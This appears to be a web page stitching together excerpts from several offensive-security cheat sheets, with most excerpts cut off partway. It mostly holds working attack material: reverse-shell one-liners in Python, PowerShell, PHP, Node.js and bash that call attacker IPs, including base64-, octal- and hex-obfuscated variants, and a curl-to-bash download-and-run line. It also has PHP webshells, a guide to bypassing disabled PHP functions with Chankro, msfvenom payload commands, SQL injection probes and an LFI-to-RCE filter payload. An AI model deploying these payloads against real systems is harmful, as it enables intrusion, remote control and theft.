WebVulnerability

This cheat sheet shows useful Python reverse shell one-liners and a PowerShell reverse shell generator in Python. 1. Python3 Reverse Shell One-liner python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.50.114",3232));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' Connects back to attacker IP 10.9.50.114 on port 3232. Uses socket, duplicates file descriptors for stdin/stdout/stderr. Spawns an interactive /bin/sh shell. Works on most Linux systems with Python 3 installed. 2. Python Script to Generate PowerShell Reverse Shell Command (Base64 Encoded) #!/usr/bin/env python3 import sys import base64 def help(): print("USAGE: %s IP PORT" % sys.argv[0]) print("Returns reverse shell PowerShell base64 encoded cmdline payload connecting to IP:PORT") exit() try: (ip, port) = (sys.argv[1], int(sys.argv[2])) except: help() payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' payload = payload % (ip, port) cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode() print(cmdline) How to use: Run this script: ...

Sometimes system, exec, shell_exec, and other dangerous PHP functions are disabled. Chankro helps us bypass these by using LD_PRELOAD and custom shared objects. 🧠 Step-by-Step Guide 🔍 1. Identify Target Architecture Access the phpinfo.php page on the target. Look for architecture info: Architecture => x86_64 → 64-bit Architecture => i686 or i386 → 32-bit 💣 2. Create Shell Script Prepare a Bash reverse shell in a file named shell: echo "bash -c 'exec bash -i >& /dev/tcp/10.10.14.5/9001 0>&1'" > shell ⚙️ 3. Install Chankro If not installed: ...

This cheat sheet contains common PHP reverse shells and webshell snippets that work in different scenarios. 1. Basic Webshell Using system() <?php system($_GET['cmd']); ?> Usage: Execute commands by passing cmd parameter in URL. Example: http://target.com/webshell.php?cmd=ls 2. PHP Reverse Shell Using One-liner with fsockopen() php -r '$sock=fsockopen("10.9.50.114",3232);exec("/bin/sh -i <&3 >&3 2>&3");' Run this on target if you can execute PHP code directly. Connects back to your listener on port 3232. 3. PHP Reverse Shell Using Named Pipe & Netcat <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.50.114 4242 >/tmp/f")?> Uses a named pipe (/tmp/f) for stable reverse shell. Requires nc (Netcat) on the target machine. 4. PHP One-liner Bash Reverse Shell (Backgrounded) <?PHP exec("nohup /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/9001 0>&1' > /dev/null 2>&1 &"); ?> Runs bash reverse shell in the background. Useful to keep shell persistent after HTTP request ends. 🔥 Tips & Notes Replace IP and ports with your attacker machine’s IP and desired port. Use nc -lvnp <port> on your machine to catch the reverse shell. Some functions like exec(), system() might be disabled — test alternatives (passthru(), shell_exec(), popen()). If nc is not installed on the target, try pure PHP or bash based shells. Always check if the web server user has permissions to execute commands or create named pipes. Combine these shells with Chankro or php-reverse-shell for better evasion.

Useful JavaScript snippets for remote command execution, reverse shells, and post-exploitation via Node.js or vulnerable eval() injection. 📄 Basic Reverse Shell using child_process.exec() require('child_process').exec('nc 0.tcp.in.ngrok.io 18402 -e /bin/sh') 📌 Listener on attacker side: nc -lvnp 18402 📄 Spawn a shell via spawn() method require('child_process').spawn('/bin/sh', []) This spawns an interactive shell on the server if injected. 📄 Execute a simple Linux command require('child_process').exec('ls -la', function(error, stdout, stderr) { console.log(stdout) }) 📄 Download and execute a script (e.g., reverse shell script) require('child_process').exec('curl http://10.10.14.5/rev.sh | bash') 📄 Reverse shell using bash and TCP require('child_process').exec('bash -i >& /dev/tcp/10.10.14.5/9001 0>&1') 💡 Use this when nc -e is restricted or not available. ...

bash -c 'bash -i >& /dev/tcp/10.10.10.14/9001 0>&1' rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f Reverse Shell Payload with Encoded Command bash -c echo${IFS}YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTAuMTQvOTAwMSAwPiYx|base64${IFS}-d|bash bash -c {echo,YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTAuMTQvOTAwMSAwPiYx}|{base64,-d}|{bash,-i} Best way to escape bad character (Recommended) echo "bash -c 'exec bash -i &>/dev/tcp/10.10.14.37/9001 <&1'" > revshell.sh curl$IFS'10.10.14.37/revshell.sh'$IFS'-o'$IFS'/tmp/revshell.sh' bash$IFS'/tmp/revshell.sh' Reverse Shell by using octal escape sequences Generating RevShell (escape sequence) echo -n "/bin/sh -c 'sh -i >& /dev/tcp/10.10.14.56/9001 0>&1'" | od -An -vto1 | tr -d '\n ' | sed 's/\([0-7]\{3\}\)/\\&/g' echo -n "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.56\",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/sh\")'" | od -An -vto1 | tr -d '\n ' | sed 's/\([0-7]\{3\}\)/\\&/g' Generating RevShell (Hex escape sequence) echo -n "sh -c 'exec sh -i &>/dev/tcp/10.10.14.56/9001 <&1'" | xxd -p|tr -d '\n'|sed 's/../\\x&/g' Executing RevShell (Never forgot to URL encode if you are sending via HTTP/s method) printf '\057\142\151\156\057\163\150\040\055\143\040\047\057\142\151\156\057\163\150\040\055\151\040\076\046\040\057\144\145\166\057\164\143\160\057\061\060\056\061\060\056\061\064\056\065\066\057\071\060\060\061\040\060\076\046\061\047'|sh Additional Shell Options and Tools Don’t forget to check with other shells such as sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, and bash. Additionally, consider using Socat for more flexibility: ...

Identifying SQL Injection Vulnerability Parameters Comments in SQL -- MySQL Linux style --+ MySQL Windows style # Hash (URL encode while use) --+- SQL comment ;%00 Null Byte ` Backtick To ascertain SQL injection vulnerability in parameters, test various symbols and observe any error or unusual behavior. Common symbols include: id=[Nothing] id=' id='' id=" id=` id=') id=") id=`) id=')) id=")) id=`)) Examples of SQL Injection Testing Perform SQL injection testing with different payloads. If the payload results in an error or unexpected behavior, it might indicate a vulnerability. Examples include: ...

File Inclusion and Path Traversal At a Glance File inclusion is the method for applications, and scripts, to include local or remote files during run-time. The vulnerability occurs when an application generates a path to executable code using an attacker-controlled variable, giving the attacker control over which file is executed. There are two different types. Local File Inclusion (LFI) where the application includes files on the current server. And Remote File Inclusion (RFI) where the application downloads and execute files from a remote server. 1 ...

Note: Always remember to use the same payload in msfconsole as you used to generate in msfvenom. Linux Reverse Shell (extension doesn’t matter for Linux) msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f elf -o shell.elf msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f elf -o shell.elf Payload Type: Shell Reverse TCP Suitable for: Linux systems, Netcat listener required. Windows x64 Reverse Shell msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f exe -o shell.exe msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f exe -o shell.exe Payload Type: Windows x64 Meterpreter Reverse TCP Suitable for: 64-bit Windows systems, spawns a Meterpreter session. ...

These codes indicate that the request was successfully received, understood, and accepted. 200 OK: The request was successful. 201 Created: The request was successful, and a resource was created. 202 Accepted: The request has been accepted but not yet processed. 204 No Content: The request was successful, but there is no content to send back. 3xx: Redirection These codes indicate that further action is needed to complete the request. 301 Moved Permanently: The resource has been permanently moved to a new URL. ...

Target File .htaccess Output with PHP String Filters No Filter Applied Output: Testing PHP Filter Payload: php://filter/convert.base64-encode/resource=.htaccess Output: VGVzdGluZyBQSFAgRmlsdGVy Payload: php://filter/string.rot13/resource=.htaccess Output: Grfgvat CUC Svygre Payload: php://filter/string.toupper/resource=.htaccess Output: TESTING PHP FILTER Payload: php://filter/string.tolower/resource=.htaccess Output: testing php filter Payload: php://filter/string.strip_tags/resource=.htaccess Output: Testing PHP Filter This filter remove any HTML or PHP tags from the file contents. PHP Payload: <?php system($_GET['cmd']); echo 'Shell done!'; ?> Payload for LIF to RCE: php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+&cmd=whoami Output: www-data